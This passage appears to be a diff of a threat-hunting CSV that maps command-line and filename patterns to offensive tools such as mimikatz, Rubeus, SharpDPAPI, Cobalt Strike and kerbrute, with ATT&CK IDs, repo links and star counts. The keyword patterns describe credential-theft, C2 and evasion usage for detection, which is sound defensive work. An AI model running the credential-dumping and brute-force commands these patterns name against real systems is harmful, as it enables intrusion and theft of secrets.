beacon_win_default*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"* beacon_win_default*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - 
TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "* --beacon=*","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "* beacon64.bin *","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","0","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" -"* Benjamin DELPY *","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation 
tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"* Benjamin DELPY *","offensive_tool_keyword","mimikatz","mimikatz default strings","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "* beRoot.py*","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0007 - TA0003 - TA0002 - TA0009 - TA0040 - TA0010","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","0","N/A","N/A","10","2262","488","2022-02-08T10:30:38Z","2017-04-14T12:47:31Z" -"* bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"* bettercap*","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation 
tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "* bhqc.py -*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","0","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" "* -bindPipe * -destHost * -destPort *","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "* bitcoin-getaddr.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -178,18 +178,18 @@ "* Blackout.cpp*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "* Blackout.sln*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" "* Blackout.sys*","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","0","N/A","N/A","8","740","116","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z" -"* bleeding-jumbo john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"* bleeding-jumbo john*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "* blindeventlog.exe*","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - 
TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","10","3","268","38","2023-08-03T22:37:44Z","2023-07-24T13:59:16Z" -"* blob /target:*.bin* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"* blob /target:*.bin* /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* blob /target:*.bin* /pvk:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"* blob /target:*.bin* /unprotect*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "* --blockDLLs --ruy-lopez*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","1","N/A","N/A","N/A","N/A" -"* --bloodhound --ns ip --collection All*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that 
helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* bof_allocator *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" -"* bof_reuse_memory *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* --bloodhound --ns ip --collection All*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* bof_allocator *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"* bof_reuse_memory *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "* -BOFBytes *","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "* BOFNET *","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z" "* BofRunner(*","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","0","N/A","10","10","129","22","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" -"* -bootkey *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -bootkey *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* Brc4LdapSentinelParser*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" "* broadcast-ataoe-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-avahi-dos.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -226,11 +226,11 @@ "* broadcast-wsdd-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* broadcast-xdmcp-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* bropper.py*","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","0","N/A","7","2","175","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" -"* brute * /password*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* BruteForce(*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"* brute * /password*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* BruteForce(*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" "* --brute-ratel*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" -"* 
Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/BruteSploit","1","0","N/A","N/A","7","665","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" -"* bruteuser *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2144","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" +"* Brutesploit*","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation 